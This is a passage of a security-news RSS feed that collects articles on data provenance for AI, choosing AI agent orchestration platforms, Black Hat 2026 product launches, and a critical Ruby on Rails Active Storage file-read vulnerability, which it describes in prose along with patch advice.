<p class="wp-block-paragraph">Metadata about document authors, which might come from the company directory, can show how much authority a document has. He describes that as building an understanding of what trust and provenance is over time by the weight and authority of who’s updating the information. After all, he says, company-generated information has more trust or can have traced provenance compared to conversational inputs from a user.</p>



<h2 class="wp-block-heading">Incentives for annotating</h2>



<p class="wp-block-paragraph">DataHub CTO Shirshanka Das saw how much of a mess data can be even with strong guidelines as former architect of LinkedIn’s GDPR strategy. “The data was a swamp, despite us having had pretty good data-first and schema-first practices,” he says. As well as cleaning up the data governance, they added in the first nuggets of the DevOps’ ‘shift left’ approach.</p>



<p class="wp-block-paragraph">LinkedIn already required data checked in to its Kafka ecosystem to have a schema, and ran CI/CD pipelines to check backward compatibility. “I attached metadata attribution and collection around compliance metadata into that pipeline, where developers weren’t able to check in a schema until they had declared what every column meant.”</p>



<p class="wp-block-paragraph">The extra work was unpopular until teams who didn’t participate saw the flood of tickets that came their way, which allowed him to extend that same proactive governance and annotation at source approach to pretty much every data set being produced.</p>



<p class="wp-block-paragraph">“The starting point of data at most companies is a lot more swampy,” he says. “Many people are using Kafka, which is a very schema forward system, and yet they’re just shoving in JSON and unstructured stuff.”</p>



<p class="wp-block-paragraph">That’s common, agrees Megha Kumar, research VP for analytics and AI at IDC, because while collecting more metadata provides better context and cleaner data lineage, it’s hard in practice. “Most organizations batch process data, so real-time context capture rarely happens,” she says. “Even the ones that process in real-time tend to have pre-defined schemas, so adding context requires changes to the data, which unfortunately happens later.”</p>



<p class="wp-block-paragraph">People don’t know how to start, says Das, so DataHub Cloud tries to add back context by collecting operational metadata from multiple systems, including queries and BI tools to extrapolate a semantic model. “We confront the mess by giving them something they can react to,” he says. “They can quickly validate, and then it starts becoming a governance layer on top where humans annotate at source.”</p>



<p class="wp-block-paragraph">Online whiteboard provider Miro, for example, dramatically improved AI agent query accuracy from about 50% to 90% using DataHub. Then they applied GitOps principles on top of what was inferred with a human in the loop for approvals.</p>



<p class="wp-block-paragraph">So getting people to do the work happened the same way at LinkedIn, says Das. “When a data scientist gets 10 times more requests because they didn’t document their work well, resulting in the AI making lots of mistakes and stakeholders constantly pinging them for answers, they have the incentive to add the annotation when they produce an analysis, because then they get out of the critical path.”</p>



<h2 class="wp-block-heading">DBOMs and data contracts</h2>



<p class="wp-block-paragraph">Provenance and lineage of data is critical, Aronchick says, so you can preserve details like who collected the data, when, from where, if the source was authoritative or canonical, what transformations were run, and exactly what the model saw.</p>



<p class="wp-block-paragraph">“It’s not just about the version and the metadata,” he says. “Where things really start to change is when you can say along the way this data has gone through these steps, this is the root source, and these were the other elements.” You want to be able to find out if there were any experimental flags, like a new customer campaign running when it was collected, as well as what claims the data contributes to.</p>



<p class="wp-block-paragraph">Aronchick advocates for a SLSA-style data bill of materials using a tool like <a href="https://usemakoto.dev/">Makoto</a>, which can add signed provenance and attestation to simplify applying central concepts of governance and structure to upstream data.</p>



<p class="wp-block-paragraph">The notion of a data contract or a data product spec is starting to become common in the financial sector says Das, defining it as a data set, or a group of data sets, bound together by a contract that defines expectations which aren’t just cosmetic but machine verifiable. They can also include operational SLOs for APIs as contracts describe not just the shape of the data but operational characteristics and guarantees.</p>



<p class="wp-block-paragraph">Document graph markup language (DGML), a new open source specification from Docugami, promises provenance down to individual data points automatically extracted from documents.</p>



<p class="wp-block-paragraph">“It’s critical to know the validity and provenance of the information your AI is relying on,” Docugami CEO and XML co-creator Jean Paoli says. “Establishing the validity of data right from the start, at scale, is vital and far more efficient than trying to clean up bad data later.” DGML combines semantic tags describing what content means in its business context with bounding boxes showing exactly where in the document the content comes from, with attestation to prove it.</p>



<h2 class="wp-block-heading">AI demands provenance</h2>



<p class="wp-block-paragraph">All this context is the kind of metadata <a href="https://www.anthropic.com/engineering/effective-context-engineering-for-ai-agents?ref=distributedthoughts.org">Anthropic’s context engineering guide</a> recommends feeding to agents for accuracy. Developers are already used to giving coding agents more context, Das argues. “The same thing is happening with data, as when people realize when AI agents can’t make sense of what they’re doing, hallucinations happen,” he says.</p>



<p class="wp-block-paragraph">Kumar agrees that organizations realize agents need context to provide better insights. “In many cases, it has to do with ensuring the existing data had clear semantics and relationships,” she says.</p>



<p class="wp-block-paragraph">If you want to make sure the purchase return window an AI chatbot promises customers is based on your own policy, not a wish list from a user forum, you need rich context. It’s not just metadata. Organizations need to have semantics, data lineage, and ontologies. “Many are also building knowledge and ontology graphs,” adds Kumar. “By ensuring the systems understand what the data means, it’ll be able to provide a better response.”</p>



<p class="wp-block-paragraph">And if you’re going to the expense of fine tuning, which needs relevant and domain- or task-specific examples, you don’t want noise, duplication, or irrelevant content in your data. You can, of course, exclude poor data if it’s annotated and verified earlier, but you can also improve model performance with extra information, Aronchick points out. “The augmentation of the existing data makes the data you pull out more valuable,” he says.</p>



<p class="wp-block-paragraph">Expanso recently <a href="https://expanso.io/news/edge-ai-startup-of-the-year-2026/">won an Edge AI award</a> for fine tuning a base level model with only about 3,200 images by augmenting them with metadata. “The reason it worked on that few is because I could tell it deterministically what was in the frame,” he adds. “It’s labeling at the point of capture instead of paying somebody to label it later. What if I developed models for predictive analytics of store behavior on a per city, region, or country basis? If I’m able to take the raw point of sale information and augment it with additional metadata, I’m turning this into a much easier thing to fine tune.”</p>



<p class="wp-block-paragraph">Or you might even avoid the expense of fine tuning entirely, suggests Das. “You get the short-term advantage by fine-tuning and getting great performance at much cheaper cost on a smaller model, and it gets stripped away in a couple of months as a new model shows up,” he says. “You have to always run that calculus of when’s the right threshold to fine tune an existing model, distil it, and then run it for a fair amount of time to recoup the costs of fine tuning.”</p>



<p class="wp-block-paragraph">Although regulated or slow-moving industries will see benefits from fine tuning a model they can run for six to 12 months on data with higher quality and better provenance, many organizations may use the improved data quality to get good results without fine tuning.</p>



<p class="wp-block-paragraph">“We’re taking a more knowledge graph-oriented approach to grounding the model, and betting on the fact that because the knowledge graph is changing often, it’s better to keep it as a runtime artifact than a baked-in one.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Five ways to evaluate AI agent orchestration platforms]]></title>
<description><![CDATA[AI agent orchestration platforms coordinate role-based and task-based AI agents, along with the tools, data, and people they depend on, into multistep workflows. These platforms are highly important for organizations scaling from handfuls to thousands of AI agents running in production.  



Two ...]]></description>
<link>https://tsecurity.de/de/3705417/ai-nachrichten/five-ways-to-evaluate-ai-agent-orchestration-platforms/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3705417/ai-nachrichten/five-ways-to-evaluate-ai-agent-orchestration-platforms/</guid>
<pubDate>Wed, 05 Aug 2026 11:39:47 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">AI agent orchestration platforms coordinate role-based and task-based AI agents, along with the tools, data, and people they depend on, into multistep workflows. These platforms are highly important for organizations scaling from handfuls to thousands of AI agents running in production.  </p>



<p class="wp-block-paragraph">Two open standards do the connective work: <a href="https://www.infoworld.com/article/4124612/5-requirements-for-using-mcp-servers-to-connect-ai-agents.html">MCP</a> (Model Context Protocol) gives agents governed access to tools and data, while <a href="https://www.infoworld.com/article/4088217/what-is-a2a-how-the-agent-to-agent-protocol-enables-autonomous-collaboration.html">A2A</a> (Agent2Agent) lets agents discover and delegate to one another, including agents built on other platforms. The orchestration layer sits on top, adding the routing, shared state, guardrails, governance, security, and observability needed to run workflows that range from fully autonomous to human-in-the-loop.</p>



<p class="wp-block-paragraph">AI orchestration platforms may be the hottest AI technology of the year. In researching this article, I identified <a href="https://drive.starcio.com/research/ai-agent-orchestration-platforms/">more than 60 commercial and open source platforms</a> that businesses can use as a control plane to manage work between AI agents, people, and automations.</p>



<p class="wp-block-paragraph">Like <a href="https://www.infoworld.com/article/4182695/develop-smarter-ai-agents-with-data-fabrics.html">data fabrics</a> and <a href="https://www.infoworld.com/article/3476848/how-to-choose-the-right-low-code-no-code-or-process-automation-platform.html">automation platforms</a>, I suspect enterprises will utilize more than one AI agent orchestration platform. Platforms are being released by hyperscalers and solution providers in enterprise SaaS, process automation, customer experience, data management, AIops, and IT infrastructure. Development-centric platforms include open source, commercial, and no-code integration solution providers.</p>



<p class="wp-block-paragraph">Here are five considerations when reviewing AI agent orchestration platforms.</p>



<h2 class="wp-block-heading">1. Observable control, oversight, and trust</h2>



<p class="wp-block-paragraph">AI agent orchestration platforms are non-deterministic and leverage AI capabilities to coordinate responses and actions across AI agents. One area to evaluate is how administrators implement controls and guardrails over which AI agents can coordinate with others and under what circumstances. Additionally, platforms should also have controls on when and where people should be involved before taking action.</p>



<p class="wp-block-paragraph">“CIOs should focus on how the AI orchestration platform clearly applies controls over autonomous decision-making,” says Heather Richards, global vice president of go-to-market strategy at <a href="https://www.verint.com/">Verint</a>. “Ideally, the platform makes it easy to define who or what can take actions, how decisions are approved, and where accountability sits when something goes wrong. If orchestration doesn’t have built-in governance, visibility, and human override, it will scale risk faster than it scales value.”</p>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/4140832/7-safeguards-for-observable-ai-agents.html">Observable AI agents</a> are primary capabilities for tracing how they interact and where decisions are made. But even more important is to review how platforms govern access to the <a href="https://drive.starcio.com/2026/06/data-management-debt-ai-era-cios/">context layer</a>, which can include <a href="https://www.infoworld.com/article/2335814/what-is-retrieval-augmented-generation-more-accurate-and-reliable-llms.html">retrieval-augmented generation (RAG)</a> for language models, <a href="https://drive.starcio.com/podcast/the-cost-of-tribal-knowledge-losing-people-can-bring-ops-to-a-standstill/">knowledge graphs</a>, and <a href="https://enterprise-knowledge.com/what-is-a-semantic-layer-components-and-enterprise-applications/">semantic layers</a>.</p>



<p class="wp-block-paragraph">“When evaluating an AI orchestration platform, organizations should consider whether governance and observability were built into the architecture from day one,” says Caitlin Schuman, director of AI strategy and customer innovation at <a href="https://www.presidio.com/">Presidio</a>. “A strong platform should make it clear what context is being used and should have a control layer that routes work across systems, agents, and humans.”</p>



<p class="wp-block-paragraph"><a href="https://drive.starcio.com/2025/10/creating-responsible-trustworthy-ai-agents/">Deploying trustworthy AI agents</a> is important for gaining employee adoption. Charles Crouchman, chief product officer at <a href="https://www.redwood.com/">Redwood Software</a>, suggests evaluating how an AI agent orchestration platform establishes trustworthy operations with enterprise resources. He recommends asking these five questions:</p>



<ul class="wp-block-list">
<li>Can it connect to the systems actually running your business?</li>



<li>Can it be trusted to execute mission-critical logic across your ERP, supply chain, and finance platforms?</li>



<li>Does it provide deterministic guardrails for non-deterministic AI, so agents can’t go rogue in production?</li>



<li>Is it model-agnostic, so you’re not locked into a single LLM or agent framework as the landscape shifts?</li>



<li>Can you govern at scale with full audit trails, observability, and accountability?</li>
</ul>



<p class="wp-block-paragraph">“Validating these answers moves you from disconnected AI  reasoning to real execution, empowering you to take the next step towards an autonomous enterprise,” says Crouchman.</p>



<h2 class="wp-block-heading">2. Secure and resilient operations</h2>



<p class="wp-block-paragraph">AI agent orchestration platforms centralize a growing number of operational workflows, so it’s important to evaluate whether their security, performance, reliability, and resiliency meet compliance and <a href="https://www.infoworld.com/article/4061123/how-to-write-nonfunctional-requirements-for-ai-agents.html">non-functional requirements</a>.  </p>



<p class="wp-block-paragraph">“Deploying agents is the easy part; the hard part is ensuring they operate safely, consistently, and in coordination with the people and systems around them,” says Daniel Meyer, CTO at <a href="https://camunda.com/">Camunda</a>. “Orchestration platforms should enforce controls between an agent’s decision and its action, handle long-running processes without losing state, and maintain a full audit trail natively.”</p>



<p class="wp-block-paragraph">Organizations should also consider how platforms support <a href="https://www.infoworld.com/article/4100507/5-key-agenticops-practices-to-start-building-now.html">agentic ops practices</a> for identity management, monitoring, AI agent accuracy, and incident management.</p>



<p class="wp-block-paragraph">“Don’t just seek solutions that coordinate workflow or handle the life cycle of an agent; also seek solutions that get the answers agents need faster, with more accuracy, all while meeting essential security and compliance requirements,” says James Urquhart, field CTO and technology evangelist at <a href="https://www.kamiwaza.ai/">Kamiwaza</a>. “A platform that securely coordinates context gathering and result formulation across widely disparate infrastructures and data sources is essential, not only to the performance of AI in the enterprise, but also to its agility.”</p>



<h2 class="wp-block-heading">3. Integrated testing and feedback</h2>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/4086884/how-to-automate-the-testing-of-ai-agents.html">Testing AI agents</a> requires validating changes before deployment, just as with <a href="https://www.infoworld.com/article/3705049/3-ways-to-upgrade-continuous-testing-for-generative-ai.html">continuous testing</a> for applications and APIs. But it also requires evaluating prompts, responses, and actions in production and ensuring that agents aren’t drifting from expected parameters or <a href="https://drive.starcio.com/2025/07/rogue-ai-agents-cios-govern-agentic-ecosystem/">going rogue</a>. One area in which AI agent orchestration platforms differ is how they support testing AI agents, monitoring them in production, and providing a centralized source of feedback to support accuracy improvements.</p>



<p class="wp-block-paragraph">“When selecting an AI orchestration platform, don’t overlook where the software it produces actually gets tested and validated,” says Jean-Philippe LeBlanc, senior vice president of engineering at <a href="https://circleci.com/">CircleCI</a>. “AI can accelerate every stage of development, but without rigorous, automated validation integrated into the delivery pipeline, you’re compounding risk at the same rate you’re compounding velocity.”</p>



<p class="wp-block-paragraph">Armando Franco, senior director of cloud and platform modernization at <a href="https://www.teksystems.com/en/it-and-business-services">TEKsystems Global Services</a>, says, “The criterion that actually matters is whether continuous outcome evaluation is a first-class capability of the platform itself, because without it, iteration speed collapses and the program stalls.”</p>



<h2 class="wp-block-heading">4. Interoperability and open standards</h2>



<p class="wp-block-paragraph">MCP and A2A are two ways AI agent orchestration platforms support open standards and enable connecting to an ecosystem of agents. Many platforms also allow developers to select and replace the underlying AI models and to choose from a range of <a href="https://www.infoworld.com/article/4032989/a-developers-guide-to-code-generation.html">AI code-generation tools</a>. These flexibilities ensure teams can optimize around performance, accuracy, compliance, costs, and other future considerations.</p>



<p class="wp-block-paragraph">“When evaluating an AI orchestration platform, we look first at composability and interoperability,” says Rajesh Arora, chief data and analytics officer at <a href="https://www.principal.com/">Principal</a>. “The real test is not how many features it offers today, but whether it can connect models, data sources, agentic solutions, and workflows in a way that adapts to our AI strategy, tech stack, and changing business needs.”</p>



<p class="wp-block-paragraph">Other interoperability criteria to review include the platform’s AI agent cataloging capabilities, how permissions are configured dynamically, and whether prebuilt connectors are available for the required integrations.</p>



<h2 class="wp-block-heading">5. Vendor viability and road map</h2>



<p class="wp-block-paragraph">Leaders recognize that <a href="https://drive.starcio.com/2026/04/ai-reshaping-business-not-digital-transformation-yet/">AI is currently reshaping business more than driving transformation</a>. To be successful, organizations require <a href="https://www.infoworld.com/article/3855572/how-to-develop-a-well-rounded-ai-governance-strategy.html">AI governance that keeps up with strategy</a> and doesn’t lag too far behind. The same is true for AI agent orchestration platforms, so it’s important to review their release notes and road maps to see whether providers strike a reasonable balance between innovation and governance.</p>



<p class="wp-block-paragraph">“The right orchestration platform provides a unified policy layer that follows work across agents, workflows, and AI tools, enabling your teams to build freely while IT and security maintain full visibility at the action and output levels,” says Brandon Sammut, chief people and AI transformation officer at <a href="https://zapier.com/">Zapier</a>. “If your governance can’t keep pace with how fast your people are building, you’ll either slow them down or lose sight of what they’re building.”</p>



<p class="wp-block-paragraph">Since AI agent orchestration platforms are a new category, technology leaders should partner with their financial, legal, and compliance colleagues to assess vendor viability risks. In addition, reviewing customer adoption and support capabilities is important as top solution providers will continue to evolve their platforms.   </p>



<p class="wp-block-paragraph">“A mature provider offers both a stable platform and the customer support you’ll need, and with a large customer base, they’ve already hit countless edge cases that can smooth your own implementation,” says Hannes Hapke, director of the 575 Lab at <a href="https://www.dataiku.com/">Dataiku</a>. “Assess maturity by looking at funding and financial backing, the clarity and consistency of their public road map, and the size and activity of their community. An engaged user base, active forums, and a healthy ecosystem of integrations all signal a provider that will still be standing when you scale.”</p>



<p class="wp-block-paragraph">Many organizations are still early in adopting AI agents and <a href="https://drive.starcio.com/2026/02/why-chaotic-ai-experiments-arent-producing-business-value/">transitioning proofs of concept into production</a>. But for those deploying a growing number of AI agents across many platforms, selecting an AI agent orchestration platform enables scaling workflows, operations, and governance. </p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AMD CEO Lisa Su hails ‘excellent quarter’ as data center sales underpin ‘record revenue and profitability’]]></title>
<description><![CDATA[The record-breaking quarter comes as AMD prepares to roll out its Helios rack-scale architecture later this year]]></description>
<link>https://tsecurity.de/de/3705393/it-security-nachrichten/amd-ceo-lisa-su-hails-excellent-quarter-as-data-center-sales-underpin-record-revenue-and-profitability/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3705393/it-security-nachrichten/amd-ceo-lisa-su-hails-excellent-quarter-as-data-center-sales-underpin-record-revenue-and-profitability/</guid>
<pubDate>Wed, 05 Aug 2026 11:29:04 +0200</pubDate>
<content:encoded><![CDATA[The record-breaking quarter comes as AMD prepares to roll out its Helios rack-scale architecture later this year]]></content:encoded>
</item>
<item>
<title><![CDATA[The top new cybersecurity products at Black Hat USA 2026]]></title>
<description><![CDATA[Black Hat 2026 is shaping up to be another AI-heavy conference, but this year’s announcements suggest the industry is moving beyond simply adding copilots to existing products.



Vendors are increasingly packaging AI into operational workflows, while pairing automation with governance, exposure ...]]></description>
<link>https://tsecurity.de/de/3705199/it-security-nachrichten/the-top-new-cybersecurity-products-at-black-hat-usa-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3705199/it-security-nachrichten/the-top-new-cybersecurity-products-at-black-hat-usa-2026/</guid>
<pubDate>Wed, 05 Aug 2026 10:02:41 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph"><a href="https://blackhat.com/us-26/" target="_blank" rel="noreferrer noopener">Black Hat 2026</a> is shaping up to be another AI-heavy conference, but this year’s announcements suggest the industry is moving beyond simply adding copilots to existing products.</p>



<p class="wp-block-paragraph">Vendors are increasingly packaging AI into operational workflows, while pairing automation with governance, exposure management, and recovery capabilities aimed at making autonomous security more practical for enterprise environments.</p>



<p class="wp-block-paragraph">Across this year’s launches, several themes stand out. Security vendors emphasize attack path analysis over raw vulnerability counts, integrating external threat intelligence directly into security and recovery workflows, and introducing purpose-built AI agents that promise to accelerate investigations without forcing customers to replace existing infrastructure.</p>



<p class="wp-block-paragraph">Below is a running list of the announcements that stood out.</p>



<h2 class="wp-block-heading">ArmorCode adds AI agents for vulnerability remediation</h2>



<p class="wp-block-paragraph">ArmorCode expanded its Agentic Control Plane with four new Anya AI agents and enhanced Context Risk Graph capabilities designed to help organizations prioritize and remediate vulnerabilities based on “real business risk” rather than raw CVE volume.</p>



<p class="wp-block-paragraph">The new capabilities introduce attack path analysis, network reachability mapping, patch management integration, and support for compensating controls such as <a href="https://www.csoonline.com/article/566615/what-is-a-waf-12-top-web-application-firewalls-compared.html">WAFs</a> and <a href="https://www.csoonline.com/article/568045/what-is-edr-endpoint-detection-and-response.html">EDR</a> platforms. The company says the new AI agents can investigate exploitability, recommend mitigations, assess cloud exposures, and orchestrate patch rollouts while reusing shared security context to reduce redundant AI analysis and operational costs.</p>



<h2 class="wp-block-heading">Cribl turns telemetry into AI observability</h2>



<p class="wp-block-paragraph">Cribl introduced a new AI Observability application alongside expanded detection engineering capabilities and stream-native detections. The AI Observability app promises enterprises visibility into AI model usage, token consumption, spending, and potential sensitive data exposure using telemetry they already collect.</p>



<p class="wp-block-paragraph">The company also enhanced its detection engineering capabilities through its CardinalOps acquisition by mapping detections to <a href="https://www.csoonline.com/article/574167/the-changing-role-of-the-mitre-att-ck-framework.html">MITRE ATT&amp;CK</a>, identifying coverage gaps, and applying AI-assisted workflows, while new stream-native detections aim to identify high-confidence threats directly from telemetry in motion without requiring another data platform.</p>



<h2 class="wp-block-heading">CommVault brings Google Threat Intelligence into recovery workflows</h2>



<p class="wp-block-paragraph">CommVault announced an integration between its Threat Scan and Google Threat Intelligence to help organizations identify clean recovery points after cyberattacks.</p>



<p class="wp-block-paragraph">The integration combines Google’s threat intelligence with CommVault’s backup validation workflows, while new inline file hash collection allows recovery points to be checked against threat indicators during backup operations. The company says the layered approach enables customers to validate recovery points faster before performing deeper malware or forensic analysis and strengthens its AI-enabled Synthetic Recovery capability. Availability is expected in the coming months.</p>



<h2 class="wp-block-heading">SOCRadar focuses on identity exposure intelligence</h2>



<p class="wp-block-paragraph">SOCRadar is introducing People Intelligence, a new identity-focused offering within its Extended Threat Intelligence (XTI) platform.</p>



<p class="wp-block-paragraph">The capability aggregates breached credentials, stealer logs, personally identifiable information, attacker telemetry, and other external identity exposure data into unified analyst records, allowing investigators to prioritize identity risks without integrating internal HR and IAM systems. Automated risk scoring and consolidated identity context are intended to reduce manual correlation work during investigations.</p>



<h2 class="wp-block-heading">Arctic Wolf doubles down on cyber resilience</h2>



<p class="wp-block-paragraph">Arctic Wolf unveiled a new Cyber Resilience offering that bundles managed detection and response, exposure management, endpoint protection, incident response, and up to $3 million in warranty protection into a single package. The offering is available immediately through Arctic Wolf and its partner ecosystem.</p>



<p class="wp-block-paragraph">Separately, Arctic Wolf also highlighted new milestones for its Aurora Agentic SOC, including processing more than 10 trillion security events per week, introducing a new Mean Time to Trusted Action (MTTA) metric, expanding its Swarm of Experts architecture, and enhancing customer visibility through updates to the Arctic Wolf Portal.</p>



<p class="wp-block-paragraph">Additionally, the company announced a partner-focused Cyber AI Readiness Accelerator that combines Aurora Attack Surface Management with consulting and remediation services from channel partners. The 30-day assessment is designed to help organizations inventory exposed assets, identify attack paths, prioritize remediation, and establish broader cyber resilience programs.</p>



<h2 class="wp-block-heading">Crogl pushes sovereign AI for the SOC</h2>



<p class="wp-block-paragraph">Crogl announced general availability of its Enterprise AI SOC Agent as a free download. Designed to run inside customer-controlled environments, including on-premises and air-gapped deployments, the autonomous investigation platform integrates with existing security tools without requiring new data pipelines or schema normalization. Crogl says the platform investigates alerts, performs threat hunts, documents investigative steps, and generates reports while allowing organizations to keep security data within their own infrastructure.</p>



<h2 class="wp-block-heading">Tanium expands autonomous security platform</h2>



<p class="wp-block-paragraph">Tanium announced several additions to its Autonomous IT Platform spanning agentic AI, exposure management, and security operations. New Alas capabilities include background AI agents, agentic performance analysis, expanded automation, and an <a href="https://www.csoonline.com/article/4087656/what-cisos-need-to-know-about-new-tools-for-securing-mcp-servers.html">MCP server</a> that exposes governed Tanium data to compatible AI assistants. The company also introduced External Attack Surface Management, Attack Path Mapping, Agent-Guided Threat Hunting, and a private preview integration with Google Threat Intelligence, extending its focus from endpoint management to coordinated autonomous security operations.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[News alert: Mallory links threat intelligence to governed response as exploit timelines shrink]]></title>
<description><![CDATA[Las Vegas, United States, August 4th, 2026, CyberNewswire – Mallory, the AI-native Threat and Exposure Management platform, today introduced a unified context and intelligence layer for security teams.
The architecture has three parts: a context graph that correlates attack … (more…) 
The post Ne...]]></description>
<link>https://tsecurity.de/de/3704791/it-security-nachrichten/news-alert-mallory-links-threat-intelligence-to-governed-response-as-exploit-timelines-shrink/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3704791/it-security-nachrichten/news-alert-mallory-links-threat-intelligence-to-governed-response-as-exploit-timelines-shrink/</guid>
<pubDate>Wed, 05 Aug 2026 06:30:30 +0200</pubDate>
<content:encoded><![CDATA[<p>Las Vegas, United States, August 4th, 2026, CyberNewswire – <a href="http://mallory.ai/" rel="nofollow">Mallory</a>, the AI-native Threat and Exposure Management platform, today introduced a unified context and intelligence layer for security teams.</p>
<p><a href="https://www.lastwatchdog.com/wp/wp-content/uploads/mallory-logo.png" rel="nofollow"><img decoding="async" class="alignright size-full wp-image-39875" src="https://www.lastwatchdog.com/wp/wp-content/uploads/mallory-logo.png" alt="" width="388" height="84" srcset="https://www.lastwatchdog.com/wp/wp-content/uploads/mallory-logo.png 388w, https://www.lastwatchdog.com/wp/wp-content/uploads/mallory-logo-100x22.png 100w" sizes="(max-width: 388px) 100vw, 388px"></a>The architecture has three parts: a context graph that correlates attack … <a href="https://www.lastwatchdog.com/news-alert-mallory-links-threat-intelligence-to-governed-response-as-exploit-timelines-shrink/" class="read-more">(more…) </a></p>
<p>The post <a href="https://www.lastwatchdog.com/news-alert-mallory-links-threat-intelligence-to-governed-response-as-exploit-timelines-shrink/">News alert: Mallory links threat intelligence to governed response as exploit timelines shrink</a> first appeared on <a href="https://www.lastwatchdog.com/">The Last Watchdog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ruby on Rails critical bug puts every image upload under scrutiny]]></title>
<description><![CDATA[A new critical vulnerability in the Ruby on Rails (“Rails”) web application framework, CVE-2026-66066, could turn a seemingly innocuous image into a front door to your secrets.



Disclosed July 30, the high severity CVE (scored 9.5 out of 10) poses a significant risk to enterprises running apps ...]]></description>
<link>https://tsecurity.de/de/3704714/ai-nachrichten/ruby-on-rails-critical-bug-puts-every-image-upload-under-scrutiny/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3704714/ai-nachrichten/ruby-on-rails-critical-bug-puts-every-image-upload-under-scrutiny/</guid>
<pubDate>Wed, 05 Aug 2026 05:22:52 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">A new critical vulnerability in the Ruby on Rails (“Rails”) web application framework, <a href="https://www.cve.org/CVERecord?id=CVE-2026-66066" target="_blank" rel="noreferrer noopener">CVE-2026-66066</a>, could turn a seemingly innocuous image into a front door to your secrets.</p>



<p class="wp-block-paragraph">Disclosed July 30, the high severity CVE (scored 9.5 out of 10) poses a significant risk to enterprises running apps that handle user-uploaded images in Rails.</p>



<p class="wp-block-paragraph">Dubbed “KindaRails2Shell,” it targets the overly-trusting Active Storage component of the open-source framework, allowing unauthenticated attackers to read sensitive files or escalate to remote code execution (RCE).</p>



<p class="wp-block-paragraph">The issue has been fixed in versions 7.2.3.2, 8.0.5.1 and 8.1.3.1 of Active Storage; enterprises running Rails should update immediately.</p>



<p class="wp-block-paragraph">“The ‘chef’s kiss’ is the ability for an attacker to upload an image that isn’t actually an image [but] is code that allows them to steal secrets,” said <a href="https://www.linkedin.com/in/dbshipley/" target="_blank" rel="noreferrer noopener">David Shipley</a> of Beauceron Security.</p>



<h2 class="wp-block-heading">Attackers get the key to the castle</h2>



<p class="wp-block-paragraph">Ruby on Rails is an open-source, server-side application framework used for building full-stack web apps and <a href="https://www.csoonline.com/article/4204548/secure-ai-adoption-starts-with-api-best-practices.html" target="_blank">application programming interfaces</a> (APIs).</p>



<p class="wp-block-paragraph">It is popular among developers because it is scalable, easy to learn and use, supports quick application development, taps into an active community of <a href="https://github.blog/engineering/architecture-optimization/building-github-with-ruby-and-rails/" target="_blank" rel="noreferrer noopener">more than 1,000 engineers</a> developing and maintaining it, and has an extensive library of nearly two million lines of prebuilt code.</p>



<p class="wp-block-paragraph">CVE-2026-66066 specifically targets Rails’ built-in Active Storage component, which lets users upload files to cloud services or local disks and link them to their applications. In particular, the vulnerability exploits the way Active Storage interacts with the <a href="https://github.com/libvips/libvips" target="_blank" rel="noreferrer noopener"><em>libvips</em> image processing library</a> to generate images.</p>



<p class="wp-block-paragraph"><em>Libvips</em> contains what are known as “unfuzzed” operations which have not been hardened against malicious inputs through techniques known as <a href="https://en.wikipedia.org/wiki/Fuzzing" target="_blank" rel="noreferrer noopener">fuzzing</a> that test where they crash, leak data, or otherwise behave erratically. This makes them unsafe for use with untrusted content, but Active Storage does not adequately disable them.</p>



<p class="wp-block-paragraph">“CVE-2026-66066 is particularly dangerous because an attacker may not need an account or privileged access,” explained <a href="https://www.sans.org/profiles/ensar-seker" target="_blank" rel="noreferrer noopener">Ensar Seker</a>, CISO at SOCRadar.</p>



<p class="wp-block-paragraph">Attackers can exploit the unsafe pipeline by uploading specially crafted files that trick Active Storage into giving them access to files that the Rails process is permitted to access, even highly-sensitive ones in app processing environments.</p>



<p class="wp-block-paragraph">In practical terms, this could expose environment variables, Rails application secrets, database credentials, cloud access keys, API tokens and credentials for connected services, Seker explained.</p>



<p class="wp-block-paragraph">Attackers can also gain access to the <em>secret_key_base</em> that signs and encrypts cookies, <a href="https://www.csoonline.com/article/570795/how-to-hack-2fa.html" target="_blank">credentials</a>, and session data. When <em>secret_key_base </em>is compromised, attackers essentially hold the key to the app.</p>



<p class="wp-block-paragraph">“The immediate vulnerability is an arbitrary file-read issue, but the theft of secrets such as Rails’ <em>secret_key_base</em> can turn information disclosure into a much broader compromise,” Seker said.</p>



<p class="wp-block-paragraph">Depending on the application, attackers could potentially forge trusted application data or sessions, access databases and cloud services, move laterally into connected systems, or achieve RCE.</p>



<p class="wp-block-paragraph">That escalation path is what makes the vulnerability critical, Seker said. “A seemingly routine image upload feature, such as a profile picture, avatar or thumbnail generator, could become an entry point into the application’s underlying infrastructure.”</p>



<h2 class="wp-block-heading">How to identify if you’re vulnerable</h2>



<p class="wp-block-paragraph">Applications are impacted when they are configured to use <em>libvips</em> for Active Storage image processing (the default behavior since Rails 7.0) and accept image uploads from untrusted or unauthenticated users. Enterprises should audit every internal and third-party app to determine whether they are configured this way, Seker advised, and patch Rails and Active Storage immediately. They should also examine every feature accepting images, including avatars, support attachments, product images, and administrative upload functions.</p>



<p class="wp-block-paragraph">Upgrading Rails alone is not sufficient when an older <em>libvips</em> installation remains underneath it; <em>libvips</em> must be version 8.13 or later, he said.</p>



